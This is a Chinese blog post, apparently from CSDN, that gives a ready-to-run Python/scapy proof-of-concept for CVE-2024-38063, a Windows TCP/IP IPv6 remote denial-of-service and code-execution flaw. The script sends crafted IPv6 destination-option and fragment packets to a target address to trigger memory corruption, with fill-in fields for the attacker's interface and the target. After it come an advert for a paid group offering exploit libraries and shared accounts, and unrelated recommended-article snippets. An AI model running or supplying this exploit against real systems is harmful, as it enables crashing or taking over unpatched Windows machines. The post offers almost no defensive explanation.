Windows TCP_IP IPv6远程拒绝服务代码执行漏洞(CVE-2024-38063)

最新推荐文章于 2024-09-29 18:57:59 发布
最新推荐文章于 2024-09-29 18:57:59 发布
阅读量379 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: tcp/ip 网络协议 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jingke666/article/details/141634532
版权

poc:

iface填攻击机网卡名
ip_addr填目标机器IP
mac_addr填目标机器mac,mac地址的-改为:填入

from scapy.all import *

iface=''
ip_addr=''
mac_addr=''
num_tries=20
num_batches=20

def get_packets_with_mac(i):
    frag_id = 0xdebac1e + i
    first = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
    second = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa'
    third = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1)
    return [first, second, third]

def get_packets(i):
    if mac_addr != '':
        return get_packets_with_mac(i)
    frag_id = 0xdebac1e + i
    first = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
    second = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa'
    third = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1)
    return [first, second, third]

final_ps = []
for _ in range(num_batches):
    for i in range(num_tries):
        final_ps += get_packets(i) + get_packets(i)

print("Sending packets")
if mac_addr != '':
    sendp(final_ps, iface)
else:
    send(final_ps, iface)

for i in range(60):
    print(f"Memory corruption will be triggered in {60-i} seconds", end='\r')
    time.sleep(1)
print("")

 内部福利介绍-更新啦,网络安全百分之八十的资源都可以在这找到!涵盖了POC库、账号共享、文档库、资源网获取、会员专属群,做你的网络安全资源大全!

近期更新的0day/1day(包含公开和未公开漏洞-仅列举部分)漏洞整理更新至9000+

图片

👇内容太多扫描二维码查看详细介绍👇

图片

棉花糖网络安全圈
关注
专栏目录
CVE-2024-38077漏洞检测工具
08-15
检测某个ip地址是否存在CVE-2024-38077漏洞Windows 远程桌面授权服务远程代码执行漏洞。 使用方法:test.exe 192.168.1.2,扫描IP地址为192.168.1.2机器是否存在漏洞
【利用场景更新】Windows TCP/IP IPv6远程拒绝服务/代码执行漏洞(CVE-2024-38063)安全风险通告...
smellycat000的专栏
08-16 164
●点击↑蓝字关注我们,获取更多安全风险通告漏洞概述漏洞名称Windows TCP/IP IPv6远程拒绝服务/代码执行漏洞漏洞编号QVD-2024-36353,CVE-2024-38063公开时间2024-08-13影响对象数量级千万级奇安信评级高危CVSS 3.1分数9.8威胁类型拒绝服务代码执行利用可能性高POC状态未公开在野利用状态未发现EXP状态未公开技术细节状态未公开危害描述:未经身...
Windows 远程桌面授权服务远程代码执行漏洞CVE-2024-38077)
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
08-10 3990
开启该服务(Windows 远程桌面授权服务)并且操作系统版本在受影响范围的 Windows Server 受影响,没有开启该服务但是操作系统版本在受影响范围的Windows Server 不受影响,Windows 10、Windows 11 等非 Server 版本的操作系统,不论是否开启Windows 远程桌面(RDS),均不受影响。这一漏洞存在于Windows远程桌面许可管理服务(RDL)中,该服务被广泛部署于开启Windows远程桌面(3389端口)的服务器,用于管理远程桌面连接许可。
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
CentOS Linux OpenSSH 远程代码执行漏洞(CVE-2024-6387)修复方案
07-04
CentOS Linux OpenSSH 远程代码执行漏洞(CVE-2024-6387)修复方案
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Apache Log4j 是一个广泛使用的 Java 日志框架,它允许应用...总之,Apache Log4j 远程代码执行漏洞是一个重大安全事件,强调了在软件开发和运维过程中对安全性的重视。及时更新和维护软件库是防止此类漏洞影响的关键。
广播IP与共享IP的关系
KookeeyLena7的博客
09-26 591
广播IP是指一种特殊的IP地址,用于在网络中向所有设备发送信息。广播地址通常是某个网络段的最后一个地址,例如,在一个子网掩码为255.255.255.0的网络中(即/24子网),其网络地址可能为192.168.1.0,广播地址则为192.168.1.255。共享IP通常指的是通过NAT(网络地址转换)技术,多个设备在局域网内共享一个公共IP地址的情况。在这种情况下,内部设备通过私有IP地址与局域网通信,而通过NAT路由器连接到外部互联网,使用一个公共IP地址进行外部通信。
【ZYNQ 开发】填坑!双核数据采集系统LWIP TCP发送,运行一段时间不再发送且无法ping通的问题解决
句点的博客
09-23 1278
针对之前博客埋的双核数据采集系统运行一段时间后网络断开的问题提供了解决的思路
k8s架构,从clusterIP到光电半导体,再从clusterIP到企业管理
最新发布
2401_84019227的博客
09-29 1078
daemonset控制器会立马用镜像重建一个新的kubeproxy的pod。kubeproxy的pod,由控制器daemonset来批量部署和维护。那么控制器就会自动在该节点新建一个kube-proxy的pod。由于k8s集群的实际负责计算的pod是分布式的在多个节点上的。总之单个节点的kube-proxy的pod掉线小几秒。因为kubeproxy的pod不是管理员手工去管理的。每个物理节点都有一个kube-proxy的pod。当一个节点上的kubeproxy的pod掉线了。
雷池 WAF 如何配置才能正确获取到源 IP
homeposted的博客
09-29 973
经常有大哥反馈说雷池攻击日志里显示的 IP 有问题。 这里我来讲一下为什么一些情况下雷池显示的攻击 IP 会有问题。 问题说明
Python 封装 socket 为 [TCP/UDP/MULTICAST] 服务端
one-ccs 的博客
09-28 602
在新线程中创建 TCP/UDP/MULTICAST 协议的服务端套接字,接收客户端的连接请求或数据,并调用 on_recv 回调函数处理数据。
ip是可以从能够上网的设备提取吗
qq_42992840的博客
09-27 248
是的,IP地址可以从能够上网的设备提取。
使用 PHP 的 strip_tags函数保护您的应用安全
记录个人成长, 分享好用资源
09-27 482
在现代 web 开发中,处理用户输入是一项常见的任务。然而,用户输入的内容往往包含 HTML 或 PHP 标签,这可能会导致安全漏洞,如跨站脚本攻击(XSS)。为了解决这个问题,PHP 提供了一个非常有用的函数:strip_tags。本文将介绍这个函数的用法及其重要性
网络层——IP
weixin_74269833的博客
09-28 1214
由32位二进制数组成,通常用点分的形式被分为四个部分,每个部分1byte,最大值为255。从功能的角度看,ip地址由两部分组成,网络号和主机号。网络号标识了ip所在的网段,主机号标识了在该网段中的唯一的一台主机。二者的区分又需要与掩码配合使用,例如192.168.1.2/24,24表示掩码255.255.255.0,将掩码与ip进行按位与操作,获得了192.168.1.0即为该主机所在网段。将IP地址中的主机地址全部设为0, 就成为了网络号, 代表这个局域网。
如何分辨那些是真实用户那些是虚假ip访问
mxlvb92520的博客
09-27 465
通过综合运用以上方法,可以有效地区分真实用户与虚假IP访问。在实际应用中,可以根据具体的业务需求和风险评估,选择适合的策略和工具,以保护网站的安全性和数据完整性。保持对这些策略的定期评估和更新,以应对不断变化的网络环境和攻击手段。
【STM32】 TCP/IP通信协议(1)--LwIP介绍
m0_73409202的博客
09-22 2391
ARPIPICMPUDPTCPDNSDHCPHTTP、FTP、MQTT等等。TCP/IP 协议栈中不同协议所完成的功能是不一样的, 某些协议的实现要依赖于其它协议,依据这种依赖关系,可以将协议栈分层。低层协议为相邻的上层协议提供服务,是上层协议得以实现的基础。以太网MAC存在于TCPIP栈中的数据链路层上。STM32F4自带有10/100Mbit/s的以太网MAC内核,这个以太网MAC内核有如下特性:支持外部PHY接口实现数据传输速率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值